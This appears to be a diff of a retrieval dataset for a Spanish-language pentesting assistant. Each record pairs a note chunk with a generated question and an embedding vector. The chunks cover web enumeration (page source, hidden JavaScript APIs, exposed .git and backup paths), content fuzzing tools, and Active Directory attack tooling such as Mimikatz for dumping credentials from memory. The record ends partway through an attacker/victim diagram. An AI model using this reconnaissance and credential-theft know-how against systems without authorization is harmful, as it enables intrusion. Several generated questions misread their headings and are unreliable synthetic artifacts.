-0.02778, -0.00516, 0.03486, 0.06673, 0.01941, 0.04611, 0.05669, -0.03209, -0.07074, 0.01199, 0.08594, -0.01879, -0.01685, -0.02462, -0.04048, 0.00323, -0.06308, 0.06136, 0.06995, 0.03033, -0.01898, 0.01595, 0.0045, -0.11349, -0.07285, -0.00936, -0.02683, 0.10424, -0.076, -0.10978, 0.01217, -0.03359, -0.04607, 0.0827, 0.05953, -0.01602, -0.01231, 0.06373, 0.00757, -0.10242, -0.03259, -0.01051, -0.01166, -0.10261, 0.12979, -0.02709, -0.03274, -0.00782, 0.07876, 0.02055, -0.03957, -0.0339, 0.08047, -0.05883, -0.0278, 0.01179, 0.03233, -0.05379, -0.05933, 0.04911, -0.03331, 0.00477, -0.01692, 0.06007, 0.05759, -0.0685, -0.04557, -0.02372, 0.00321, -0.04146, -0.05926, 0.07021, -0.02688, -0.06178, 0.03337, 0.02504, 0.01361, -0.02533, 0.05674, -0.0688, -0.0281, -0.04073, 0.0168, 0.00351, 0.01097, 0.0363, 0.01392, 0.01194, 0.0256, 0.0717, 0.0666, 0.00945, 0.03344, 0.00642, -0.03322, -0.00647, -0.00507, -0.05165, -0.07133, -0.01974, 0.05481, -0.03419, -0.01351, -0.00434, -0.04162, -0.02168, 0.00674, 0.06575, 0.04694, -0.01867, -0.0272, -0.08167, -0.06175, 0.01971, 0.00529, 0.00055, -0.03558, 0.06661, 0.03699, -0.0479, 0.09764, -0.0195]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Primero, lo manual\n```\nCtrl+U siempre β†’ comentarios con creds, paths, endpoints\nJS embebidos β†’ APIs ocultas (LinkFinder, JSparser)\nrobots.txt β†’ perezoso; mira tambiΓ©n:\n sitemap.xml, .git/, .svn/, .htaccess, .DS_Store,\n backup/, old/, dev/, test/, admin/\n```", "indexar": "cual es una tΓ©cnica para descubrir APIs no documentadas analizando el JavaScript", "v": [-0.02228, 0.09883, -0.03007, -0.17033, 0.03723, -0.09232, 0.09327, -0.08889, -0.02133, 0.05996, -0.0851, -0.16791, -0.14841, -0.04854, 0.12631, -0.01228, 0.181, -0.10575, 0.17441, 0.06553, -0.00803, -0.06765, -0.22637, -0.08122, 0.00164, -0.07749, -0.03773, 0.01865, -0.08822, -0.05956, -0.08854, 0.0194, -0.04546, -0.0217, -0.15848, 0.08344, 0.06203, 0.02713, -0.07636, 0.09355, -0.03403, -0.09321, -0.11111, 0.0184, 0.00856, -0.03231, 0.07215, 0.01314, -0.05999, -0.03458, 0.03502, 0.08083, -0.13398, 0.08296, -0.04251, 0.01733, 0.11669, -0.12242, 0.0289, -0.05964, 0.04481, -0.05246, -0.12617, -0.11973, 0.01958, -0.11507, -0.02268, 0.0392, 0.01204, 0.1163, -0.02702, -0.04043, -0.02286, -0.03391, -0.07552, 0.03269, -0.00252, 0.02073, 0.05422, 0.06794, 0.03358, 0.02809, -0.06895, 0.04381, -0.00253, -0.07632, 0.0302, -0.01262, 0.02346, -0.07138, -0.04089, -0.02714, 0.02263, 0.02152, 0.0457, 0.02682, 0.10762, -0.00879, 0.06956, -0.01362, -0.03842, -0.11218, -0.12785, -0.06573, 0.13359, 0.08217, 0.01874, -0.04703, 0.01984, -0.00638, -0.03451, 0.07497, -0.13747, 0.00948, -0.0336, -0.01987, 0.02939, -0.06247, 0.03682, -0.11147, 0.00722, 0.02021, -0.03597, -0.06226, -0.03457, -0.01806, -0.08762, 0.06764, 0.09252, 0.0429, 0.00481, 0.02259, -0.11684, 0.05292, 0.04267, 0.12198, 0.14139, -0.06089, -0.02797, 0.01936, -0.03561, -0.034, 0.01822, 0.03341, 0.0355, -0.00582, 0.03195, -0.0235, -0.08023, -0.0575, -0.04589, -0.08467, 0.00867, 0.07603, -0.04358, -0.0566, -0.03309, -0.04282, -0.08062, 0.06261, 0.03366, 0.04185, -0.00606, 0.01502, 0.04417, -0.04422, -0.02329, -0.10005, 0.04557, -0.03777, 0.02807, -0.00056, -0.02832, -0.04999, 0.02576, -0.05315, -0.07087, -0.03356, -0.00025, -0.04583, -0.01361, -0.04697, 0.02633, 0.00439, -0.07684, -0.00641, 0.03913, -0.02606, 0.01504, -0.03585, -0.02974, 0.07656, -0.00416, 0.02563, 0.01147, -0.01784, -0.01551, -0.0142, -0.08003, -0.01748, -0.04054, 0.06218, -0.02174, -0.03641, -0.05948, -0.03559, -0.02712, -0.00472, -0.05431, -0.04164, 0.00148, -0.03322, 0.03302, -0.00159, -0.01371, -0.00623, -0.04103, 0.01039, 0.00348, 0.06901, -0.02395, 0.03152, 0.05711, 0.00292, 0.06961, -0.01153, 0.01891, 0.04279, -0.02336, 0.01973, -0.0264, -0.02428, -0.00161, 0.05822, 0.02639, 0.04409, 0.03764, -0.04518, -0.02952, -0.02484, 0.0672, 0.07151, -0.07941, -0.04641, -0.033, -0.02785, -0.08547, -0.00161, -0.0049, -0.05652, 0.01731, 0.00556, 0.03772, -0.04764, 0.05627, -0.04063]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Fuzzing de contenido\nBrute force de rutas/ficheros con gobuster/feroxbuster/ffuf β†’ nota dedicada: Content discovery.\n- Hostnames/vhosts β†’ Vhosts y subdominios.\n- Intercepta y manipula todo con Burp Suite.", "indexar": "ΒΏQuΓ© programa sirve para encontrar rutas y archivos ocultos en un sitio web?", "v": [0.07851, -0.0466, -0.07236, -0.10796, 0.06987, -0.18411, 0.01226, -0.11662, 0.05214, -0.11083, -0.11746, -0.19826, 0.07609, 0.01973, 0.0066, -0.03365, 0.10345, -0.02794, 0.12867, -0.03865, -0.07413, -0.0512, 0.00482, 0.00061, -0.11295, -0.10954, 0.18414, 0.04465, -0.0594, -0.00822, 0.02806, 0.05707, 0.0537, -0.00924, -0.05543, 0.02079, 0.15975, 0.01125, -0.01711, -0.05668, 0.02687, -0.02623, -0.05, 0.09008, 0.01129, -0.01012, -0.01148, -0.08804, 0.01137, -0.01047, -0.03147, -0.09552, -0.07785, 0.03057, 0.09258, -0.02701, -0.04147, -0.13542, 0.01604, 0.03633, -0.03095, 0.03569, 0.00804, -0.04425, -0.03355, -0.03767, 0.01215, 0.09502, -0.08508, -0.02447, 0.02249, 0.0325, 0.16661, 0.00041, -0.00496, 0.01349, -0.00615, -0.04891, -0.00158, -0.02332, 0.1079, 0.06749, -0.0125, 0.08045, -0.08711, -0.03375, -0.00298, 0.03626, -0.07412, -0.05931, 0.05812, 0.10986, -0.02501, 0.0878, -0.03126, -0.1023, 0.11855, 0.00104, 0.02719, -0.011, -0.01617, -0.06084, -0.08438, 0.10237, -0.03026, 0.1539, 0.01477, 0.0038, -0.0943, 0.06195, 0.12416, -0.01801, -0.09145, 0.03839, -0.0623, 0.09355, 0.06141, -0.01518, 0.03929, -0.07906, -0.10654, 0.0871, -0.11975, 0.05217, 0.02142, 0.02461, -0.00383, 0.12193, -0.07502, 0.02676, 0.04233, -0.04287, -0.07428, -0.01757, -0.08792, -0.0641, 0.11503, 0.07003, -0.00533, -0.01736, 0.09623, -0.05473, -0.09023, 0.03962, 0.04361, -0.02265, 0.04978, -0.03954, -0.02854, -0.04957, -0.095, 0.03298, 0.00744, 0.00456, 0.00926, 0.01059, -0.01982, -0.10216, -0.10792, 0.0138, -0.04498, 0.07313, -0.04649, -0.07984, 0.04795, -0.02581, -0.03195, 0.05645, 0.06753, -0.0038, 0.0376, 0.08453, 0.02069, -0.14602, -0.04955, 0.04386, -0.0242, -0.10002, 0.11157, -0.0133, -0.03354, 0.01453, 0.05848, 0.0895, -0.01742, -0.02392, 0.1085, -0.06806, -0.05479, 0.02161, 0.01477, -0.09679, -0.07216, -0.01055, -0.03232, -0.01466, 0.00532, 0.04672, 0.04841, -0.07622, -0.01651, -0.03248, -0.01719, 0.0204, -0.01928, 0.05231, 0.01373, -0.08445, 0.04411, 0.05292, -0.02255, -0.03144, 0.05583, -0.07536, -0.00482, -0.05997, 0.01071, 0.01622, 0.00304, 0.03353, 0.00178, -0.00956, -0.01318, 0.02641, 0.08226, -0.01046, 0.0171, -0.01843, -0.0247, 0.02067, -0.03077, -0.05261, -0.05822, -0.00487, 0.01148, -0.04914, -0.02405, 0.02885, -0.04507, -0.0155, -0.02386, 0.04635, 0.054, -0.01803, -0.0122, -0.03091, -0.02145, 0.00459, 0.01867, 0.00746, -0.05762, 0.0088, 0.01192, 0.02093, 0.05327, 0.02481]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Apuntes Active Directory Pentest\n\nMimikatz Β· Impacket Β· Kerberos Β· BloodHound Β· Pivoting\n\n---", "indexar": "que programa puedo usar para probar la seguridad de un dominio activo directorio", "v": [-0.02376, 0.04047, -0.18677, -0.22602, -0.04366, -0.03824, 0.01865, -0.06788, -0.18856, -0.03577, -0.00539, -0.11997, -0.02544, -0.16569, -0.07014, -0.09443, 0.18022, -0.07757, -0.04346, -0.04685, 0.05113, -0.04504, -0.08413, -0.03708, 0.06305, 0.03588, 0.00112, -0.07784, -0.01456, 0.06319, 0.01011, -0.02722, 0.17061, -0.07938, -0.04329, -0.05815, 0.05683, -0.0282, 0.15416, 0.17305, 0.03167, -0.04281, -0.09322, 0.0114, 0.0338, 0.10488, 0.03003, -0.13285, -0.03669, -0.09297, 0.01869, -0.07743, -0.03245, -0.10705, 0.07482, -0.03314, 0.02589, -0.11117, -0.00937, -0.05885, -0.06024, -0.06603, 0.03866, 0.07743, -0.0302, -0.14325, 0.05172, 0.02406, -0.14309, 0.04095, 0.04164, 0.0737, 0.05594, 0.10266, 0.01258, -0.06327, 0.07415, -0.08826, 0.02827, 0.02119, -0.05152, 0.0446, 0.01367, 0.0245, -0.2251, -0.183, -0.02523, -0.12438, 0.02598, -0.00033, 0.09035, 0.09272, -0.0231, 0.04445, 0.05147, -0.03407, 0.06664, 0.01984, -0.00208, -0.03603, 0.11066, 0.02334, -0.07684, 0.12187, 0.09133, 0.06181, -0.01241, 0.04599, -0.0246, 0.00931, -0.0639, -0.07625, -0.09013, -0.06043, -0.05033, 0.09082, -0.07447, -0.06796, 0.09537, -0.04772, -0.03819, -0.00665, -0.02231, 0.0596, 0.10434, -0.00399, 0.03338, 0.04409, -0.07387, 0.00554, 0.02506, -0.00738, -0.05028, -0.05974, -0.08623, 0.02186, 0.02168, -0.021, -0.02622, -0.0482, 0.02479, 0.05008, -0.03185, 0.00815, 0.00074, 0.01054, 0.00117, -0.0479, -0.03076, 0.06347, -0.02412, -0.00895, -0.03777, 0.04071, -0.03745, 0.01489, 0.03966, -0.01966, 0.01053, 0.05041, -0.04183, 0.01985, -0.0331, 0.03715, 0.0514, -0.02327, 0.02684, -0.0406, 0.03434, 0.0517, -0.01047, 0.08886, 0.05094, -0.08874, -0.00309, -0.01956, -0.01125, -0.08181, 0.01715, -0.04404, -0.0168, -0.0288, 0.01798, 0.02333, 0.00693, 0.00071, 0.04213, 0.0388, -0.01057, 0.03905, 0.0116, 0.07729, -0.04728, 0.0186, -0.00469, -0.02032, 0.04073, -0.02326, 0.00716, -0.03347, -0.02319, -0.0072, -0.01677, -0.04455, 0.05507, 0.00045, -0.02789, 0.03158, 0.04668, 0.00112, 0.0038, -0.01303, 0.09187, -0.01319, -0.04217, 0.00179, -0.01648, 0.05646, -0.0169, -0.00885, -0.03301, 0.0248, -0.01013, 0.03319, 0.0334, -0.05392, 0.01095, -0.02482, 0.02992, 0.0219, 0.00192, -0.01522, -0.05886, -0.0276, 0.05718, -0.00202, 0.02025, 0.00874, -0.01226, -0.04718, -0.06809, 0.09905, 0.00368, -0.0283, -0.07758, -0.04143, -0.06512, 0.03931, -0.02577, -0.0176, -0.00613, 0.02085, 0.0196, -0.04951, -0.0323, 0.02706]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Apuntes Active Directory Pentest\n\nMimikatz Β· Impacket Β· Kerberos Β· BloodHound Β· Pivoting\n\n---", "indexar": "con que herramienta puedo extraer credenciales de memoria en Windows", "v": [-0.0046, 0.06941, -0.11351, -0.14104, 0.05842, 0.00574, -0.07138, 0.0412, -0.07441, -0.20777, -0.04813, 0.05787, -0.01041, -0.11375, 0.01172, 0.08716, 0.10859, -0.032, -0.01961, -0.00176, -0.02115, -0.09375, -0.12238, 0.03815, -0.0491, 0.02531, -0.0376, 0.07568, -0.08329, 0.10208, 0.00273, 0.07949, 0.0371, -0.0803, -0.03411, 0.07229, -0.09436, 0.10592, 0.012, 0.0646, 0.02146, 0.14656, -0.00628, 0.09541, 0.08392, -0.03728, 0.00345, 0.02072, 0.03224, -0.00461, -0.04029, -0.16405, -0.0419, -0.05911, 0.08944, -0.09187, 0.15261, -0.07146, 0.00584, -0.06052, -0.0406, 0.12255, -0.03015, 0.03695, 0.04143, 0.04097, 0.04703, -0.0612, -0.06721, 0.18826, -0.16496, -0.00717, 0.13098, -0.02743, -0.0051, -0.0112, 0.00778, 0.01349, 0.07785, 0.01021, 0.02333, -0.03311, 0.00648, -0.08477, 0.02729, -0.05694, 0.00519, -0.03254, 0.02472, -0.08897, 0.03598, 0.03249, -0.06895, 0.14883, 0.06417, -0.02429, 0.03243, 0.05355, 0.01845, 0.07135, 0.07134, -0.12064, -0.05882, 0.16897, 0.01583, 0.02246, -0.03178, -0.01162, -0.10208, -0.06776, 0.07189, 0.0451, -0.04397, 0.02569, -0.09974, 0.08972, 0.02099, -0.02299, 0.01715, 0.01154, 0.0481, -0.08187, -0.02766, -0.03626, -0.02222, -0.03138, -0.14425, 0.10703, -0.11496, -0.10293, 0.0076, 0.08971, -0.03799, -0.06051, -0.00678, 0.02586, 0.00261, -0.02821, 0.03956, -0.05342, 0.06427, 0.00305, -0.01512, -0.07707, -0.06546, 0.05104, 0.04612, 0.09072, -0.00242, -0.09374, 0.09149, -0.01976, 0.03485, 0.02106, -0.03709, 0.03659, 0.0413, 0.08616, -0.05512, 0.00678, -0.11754, -0.04435, 0.03473, -0.00871, 0.00659, -0.04325, -0.04082, 0.05467, 0.07082, 0.02888, -0.00618, -0.04454, 0.01208, -0.03377, 0.00966, -0.00929, -0.0253, -0.01718, -0.00674, -0.06779, -0.07218, 0.00794, -0.0376, -0.04334, -0.03844, -0.06459, -0.00406, 0.02305, -0.03784, -0.00851, -0.04265, -0.01191, 0.11526, -0.04217, 0.02588, -0.01836, -0.01498, -0.01556, 0.06769, 0.04262, -0.08647, 0.05983, -0.02928, -0.02312, 0.06113, 0.11908, -0.02602, 0.04416, 0.02312, 0.02917, 0.02382, -0.00953, -0.00125, -0.0688, -0.06679, -0.03731, 0.00507, -0.01355, -0.04573, -0.06164, 0.0462, 0.02315, 0.09799, 0.02278, -0.08606, -0.03145, -0.03838, 0.03257, -0.03928, -0.03104, 0.01765, 0.02656, -0.01812, -0.02442, 0.04086, -0.02761, -0.00564, -0.05295, -0.03879, 0.00862, -0.06626, 0.0025, -0.04425, -0.03453, -0.1183, -0.03431, 0.02579, 0.02418, 0.0306, -0.10464, 0.00561, 0.01283, 0.06625, -0.03564, -0.00379, 0.03261]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Apuntes Active Directory Pentest\n\nMimikatz Β· Impacket Β· Kerberos Β· BloodHound Β· Pivoting\n\n---", "indexar": "cual es una alternativa libre a Mimikatz para auditorΓ­as internas", "v": [-0.00867, 0.05246, 0.02747, 0.06561, 0.05134, -0.01314, -0.13273, -0.02968, -0.31978, 0.02554, 0.05044, -0.12927, 0.05553, 0.1333, 0.13452, -0.11926, 0.18409, -0.0615, 0.14101, -0.02237, 0.04476, -0.00673, -0.03205, 0.00574, -0.11967, -0.02649, 0.13132, 0.02785, 0.02807, -0.03294, 0.01175, -0.01535, 0.11556, 0.02123, -0.01352, 0.01051, 0.12257, 0.03512, 0.13208, -0.03958, 0.05884, 0.03773, -0.0034, 0.12638, 0.08267, -0.15618, -0.01561, 0.03334, 0.04969, 0.07785, -0.1236, 0.04874, -0.02903, 0.09234, 0.00757, -0.07878, -0.0049, -0.07582, -0.0669, -0.04689, -0.0954, -0.03533, 0.0359, 0.02488, -0.01631, 0.07047, -0.02183, 0.04745, 0.04349, 0.12982, 0.03427, -0.03401, -0.01656, -0.11371, -0.14239, 0.0586, -0.04904, -0.0121, -0.04275, 0.05477, 0.06577, -0.04285, -0.00219, 0.13803, -0.01047, -0.02798, -0.02655, -0.01213, -0.00098, 0.07735, -0.07842, -0.00768, -0.0189, 0.0329, -0.14559, -0.02445, 0.05766, 0.0797, -0.07657, 0.02907, -0.02212, -0.01434, -0.10899, 0.02162, 0.04748, 0.02052, -0.06072, -0.03132, -0.00813, 0.05068, 0.00478, 0.06022, -0.14685, -0.04889, -0.02199, -0.03354, 0.01099, 0.09707, -0.07982, -0.00358, 0.04883, 0.01266, -0.05175, -0.08617, -0.08321, -0.09098, 0.08265, -0.00284, 0.01262, 0.01561, 0.09874, -0.02254, -0.0092, -0.08211, -0.01646, -0.09739, -0.01693, -0.041, -0.02433, 0.0382, -0.06117, -0.0668, 0.06552, 0.0397, 0.06731, 0.01292, -0.06162, -0.04066, 0.01111, -0.03714, -0.12675, -0.00588, -0.02824, 0.05286, -0.05303, 0.03395, 0.00571, -0.00365, -0.08417, 0.03986, 0.07621, -0.08477, 0.03141, 0.04107, 0.0053, -0.02278, 0.03602, -0.04886, -0.05906, -0.0657, -0.02066, 0.05507, 0.01159, -0.03432, 0.05341, -0.07614, -0.03009, -0.0895, 0.06144, -0.0782, 0.00866, 0.07099, -0.04583, -0.07331, 0.01207, -0.04864, 0.03387, 0.07197, 0.06029, -0.00238, -0.01555, -0.02256, -0.0152, -0.06258, 0.0154, 0.04636, 0.01341, -0.10529, -0.08203, -0.04006, -0.07165, -0.04039, -0.04228, -0.0573, 0.04359, -0.03305, 0.00866, 0.04205, 0.04483, 0.00115, 0.08987, 0.03833, 0.08121, 0.01938, -0.02307, 0.02085, 0.00488, -0.04512, -0.00119, -0.00456, -0.00407, -0.01638, 0.04985, 0.02711, 0.00842, 0.04565, -0.00311, -0.01238, -0.04409, 0.01567, -0.01003, -0.03798, 0.03004, 0.01653, 0.01285, -0.02781, -0.05119, 0.0296, 0.04592, -0.0215, 0.04415, 0.02676, -0.0229, -0.01439, -0.00854, 0.01131, -0.03108, 0.00329, -0.05144, -0.02728, -0.00619, 0.03002, 0.0177, 0.04118, 0.07627, -0.02761]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "## El mapa mental de todo", "indexar": "quΓ© herramienta sirve para crear un mapa mental completo?", "v": [-0.05281, 0.09364, -0.14735, -0.12503, -0.01877, -0.14601, -0.18255, 0.01071, -0.12099, -0.11507, -0.10164, 0.00248, 0.09812, -0.07272, 0.00535, 0.08544, 0.15124, -0.09861, 0.00961, -0.02565, -0.06177, -0.04786, -0.03366, -0.07026, -0.12059, -0.08764, 0.10102, -0.01294, -0.20584, 0.06139, 0.06006, 0.12787, 0.01505, -0.06808, -0.02804, -0.0599, 0.07579, 0.04325, -0.1087, 0.02725, -0.06866, 0.04972, -0.01824, 0.13422, -0.00322, 0.00506, 0.0242, 0.02783, -0.00937, 0.15149, -0.00644, -0.0586, -0.11507, -0.03636, 0.08193, -0.10516, 0.07256, -0.19031, 0.05843, -0.11231, -0.21423, 0.01292, -0.07458, -0.05489, -0.02939, -0.0154, 0.0519, -0.01911, -0.04059, 0.08449, -0.14086, 0.0084, 0.05593, -0.06536, 0.01601, -0.00193, -0.06273, 0.01755, 0.01915, -0.03769, 0.08233, -0.04262, -0.13606, -0.04939, -0.05465, -0.06967, 0.05133, -0.00438, 0.0451, -0.11319, -0.03886, 0.08893, 0.00281, 0.01598, -0.02844, 0.01646, 0.07797, 0.02668, -0.01548, 0.03318, 0.11583, -0.11953, -0.11675, 0.05343, -0.0404, -0.01948, -0.00929, -0.00448, -0.10462, 0.01159, 0.05426, 0.03316, -0.04973, 0.04617, -0.01554, 0.01601, -0.00147, 0.07356, 0.04406, 0.0073, -0.01044, 0.055, -0.03044, -0.01691, -0.02957, 0.02048, -0.04344, 0.0, 0.04778, 0.00305, -0.00864, -0.04625, -0.10472, 0.00323, -0.03381, -0.00204, 0.02812, -0.04671, 0.01629, -0.05935, 0.0147, 0.03918, 0.01069, -0.09926, -0.08979, 0.04671, 0.02364, -0.04609, 0.01049, 0.07081, 0.01576, 0.03699, 0.05589, -0.03056, -0.04283, 0.00151, -0.03457, -0.0302, -0.06999, 0.05903, -0.02268, -0.03077, 0.04311, 0.06132, 0.01584, -0.08053, -0.00327, -0.00398, 0.07558, 0.10694, -0.01714, -0.06675, 0.1369, -0.04941, 0.04482, -0.07259, -0.05553, -0.00257, -0.00771, -0.03738, -0.05438, -0.0618, -0.00804, -0.01233, -0.04942, -0.03733, 0.05009, -0.038, 0.03745, -0.02799, -0.05942, 0.04725, -0.02904, -0.05827, 0.05242, -0.0038, 0.04411, 0.00585, 0.0218, -0.01952, -0.01911, -0.04875, -0.01803, -0.0089, -0.03285, 0.09751, 0.00497, 0.00256, 0.00063, 0.08208, -0.00483, -0.07486, 0.01529, -0.07755, -0.00838, -0.01691, 0.00526, -0.01183, 0.0228, -0.00052, 0.00209, 0.01316, -0.0176, 0.01938, -0.00862, 0.06695, 0.01944, 0.02866, -0.00227, 0.02582, 0.02215, -0.03258, 0.00184, 0.01188, 0.0376, -0.0661, 0.07942, -0.02497, -0.03778, -0.05508, -0.0, 0.05632, -0.02089, -0.02438, -0.02545, -0.06293, 0.03037, -0.01284, -0.02196, -0.0915, -0.06028, -0.00318, 0.07619, -0.01656, 0.03784, 0.01455]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "## El mapa mental de todo", "indexar": "con quΓ© puedo montar un esquema visual de todo?", "v": [-0.0788, 0.06881, -0.29246, -0.06626, -0.15832, -0.00952, -0.04646, -0.01954, 0.01411, -0.20826, 0.13067, -0.08511, -0.02263, 0.03391, 0.1717, 0.20829, 0.11024, -0.11496, 0.02792, 0.02445, -0.0093, -0.17133, -0.03925, -0.04636, -0.12079, 0.09109, -0.01537, -0.02233, -0.07124, -0.06918, 0.04219, 0.11039, 0.0636, -0.01263, -0.03531, -0.0663, 0.08009, 0.0408, 0.00793, -0.03459, -0.09659, 0.03827, -0.06066, 0.03821, 0.02029, -0.07503, 0.01158, -0.01565, -0.11088, -0.0452, 0.01242, 0.11349, -0.10471, 0.00741, 0.0101, -0.03533, 0.10118, -0.05341, 0.1413, 0.10225, 0.02768, 0.04969, 0.01287, 0.04028, 0.0056, -0.0099, -0.02198, 0.03927, -0.04665, -0.00766, -0.02224, -0.06302, -0.00333, 0.04154, 0.04875, 0.11637, -0.04887, -0.08201, 0.02603, 0.02094, 0.01236, -0.00766, -0.04702, 0.20651, -0.03193, -0.02156, -0.07255, 0.00691, -0.01519, -0.00484, -0.0092, 0.01332, 0.04046, -0.01537, -0.0388, 0.02602, -0.00841, 0.09135, -0.00369, 0.06142, -0.05757, -0.01094, -0.08357, 0.15609, 0.0857, -0.0605, 0.06088, 0.04204, -0.03657, -0.00619, -0.00483, 0.06497, -0.16747, 0.06754, -0.06777, -0.12695, 0.01375, 0.08949, -0.03783, 0.00578, 0.01946, 0.11273, 0.0123, 0.02613, 0.10909, -0.02634, 0.09479, 0.15073, -0.06934, 0.05485, -0.01636, 0.00423, -0.03322, -0.01246, -0.05445, 0.00229, -0.03342, -0.05369, -0.02279, 0.0147, 0.00263, 0.02168, 0.03736, -0.01561, -0.04446, -0.00387, 0.09498, -0.10121, -0.03064, 0.02368, 0.01284, 0.09976, 0.04864, 0.02507, -0.02347, 0.03366, 0.02692, -0.02618, 0.06692, 0.02228, -0.0266, 0.02691, 0.00014, 0.0908, -0.03568, -0.03727, -0.07103, 0.01267, -0.01387, 0.00445, -0.00454, 0.01354, 0.04788, 0.00248, 0.08567, -0.00961, -0.09119, -0.06189, -0.05511, 0.00652, -0.04224, 0.02547, 0.00309, 0.07257, 0.01931, 0.0053, -0.0122, 0.0462, 0.02133, -0.0305, -0.03417, 0.02765, 0.02199, -0.01744, 0.05497, -0.02984, -0.01358, 0.01639, 0.02242, -0.02355, -0.03052, -0.02717, 0.05393, -0.0588, -0.02035, 0.01987, -0.00602, 0.07326, 0.0411, 0.09118, 0.07083, -0.03297, -0.00921, -0.08997, -0.00776, 0.01989, 0.03869, 0.02588, -0.02425, 0.0229, 0.06729, 0.05034, -0.00712, 0.03363, -0.01548, -0.00573, -0.03034, 0.05443, -0.0223, 0.02035, -0.03282, 0.00746, -0.01148, 0.05247, -0.02693, -0.02636, -0.02563, -0.00614, -0.00879, -0.00803, 0.05312, 0.07053, 0.01819, -0.0336, -0.00877, -0.04038, -0.06363, 0.03705, -0.00826, -0.02598, -0.01454, 0.0183, 0.00487, -0.05188, -0.00091, -0.01486]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "## El mapa mental de todo", "indexar": "cuΓ‘l es una alternativa libre para dibujar el mapa mental de todo?", "v": [0.1609, 0.05361, -0.05642, 0.07073, -0.05943, 0.00392, -0.15014, 0.02182, -0.16178, -0.08099, 0.04799, -0.10821, -0.00814, -0.02274, -0.03705, -0.04256, 0.12958, 0.01641, 0.06581, -0.09022, -0.00034, -0.00014, -0.05087, 0.01459, 0.00573, -0.14953, 0.01039, 0.058, -0.09999, 0.04331, 0.02838, 0.08364, 0.10791, -0.04772, -0.01499, -0.01721, 0.20337, 0.03497, 0.00035, -0.08293, -0.07968, 0.0115, -0.03283, 0.15031, -0.07705, -0.04647, -0.00675, 0.00739, -0.04048, 0.11483, 0.00743, 0.0665, 0.02615, 0.04788, 0.12711, -0.0638, 0.07611, -0.11597, 0.06854, -0.09353, -0.06811, 0.01461, -0.05154, -0.06909, 0.03929, 0.0188, 0.01396, 0.01743, -0.05748, 0.08623, 0.02586, 0.00793, 0.00518, -0.09576, 0.02173, 0.00223, -0.13843, -0.05763, 0.06995, 0.0013, 0.02003, -0.09861, -0.02796, 0.01605, -0.02604, -0.06599, -0.01095, -0.12189, -0.02934, -0.0694, 0.02111, 0.0337, 0.03227, 0.07656, -0.1174, 0.00331, 0.00231, 0.14944, 0.00953, 0.03411, 0.04074, -0.05309, -0.18283, -0.04879, -0.02571, -0.05342, -0.00375, 0.02239, -0.12497, 0.09713, 0.02197, 0.0438, 0.00985, 0.06974, -0.04979, -0.07495, 0.0068, 0.1323, 0.0359, -0.01709, 0.00046, -0.0518, 0.07031, -0.06171, 0.05905, 0.02797, -0.01037, 0.01331, 0.00719, 0.06684, -0.03888, 0.01313, -0.10391, -0.04429, -0.10235, 0.05276, 0.00351, -0.02935, 0.10137, 0.01245, -0.00228, 0.02943, 0.07669, -0.05154, -0.07665, 0.02909, -0.01574, -0.05923, -0.04932, 0.04096, -0.0921, 0.07367, 0.153, 0.06447, 0.02366, 0.04653, -0.048, -0.04357, -0.02428, 0.08026, 0.00315, 0.01978, 0.05815, 0.11029, 0.00264, -0.08329, -0.05635, -0.05209, -0.01833, 0.10107, -0.00182, -0.01897, 0.09602, -0.02281, 0.09289, -0.07589, -0.02925, -0.05203, -0.00307, 0.01492, -0.0071, 0.02514, 0.01416, 0.00254, -0.05655, -0.02591, 0.037, 0.05763, 0.0871, -0.03999, -0.09382, -0.00501, -0.04244, -0.01027, 0.03338, -0.00942, 0.07802, 0.07604, -0.04003, -0.04294, -0.00724, -0.03882, -0.03058, 0.01193, -0.05737, 0.0746, -0.02791, 0.09184, 0.00201, 0.07989, 0.00829, -0.06522, 0.04412, -0.08831, 0.02678, 0.0454, -0.03229, -0.07233, 0.06807, -0.01675, -0.00032, 0.09547, -0.01236, 0.0229, 0.00106, 0.07177, 0.02098, 0.06127, -0.01348, 0.06891, 0.03065, 0.0615, 0.01792, 0.03393, 0.04074, -0.01294, 0.03677, -0.00049, 0.02347, -0.0698, 0.08344, 0.06955, -0.0346, 0.02282, 0.00436, -0.01973, -0.04818, -0.04791, 0.00128, -0.0275, -0.03286, 0.04772, 0.08985, 0.04641, 0.02134, 0.03171]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ TU KALI/DEBIAN β”‚ β”‚ VICTIMA WINDOWS β”‚\n β”‚ (la atacante) β”‚ β”‚ (cliente o servidor) β”‚\n 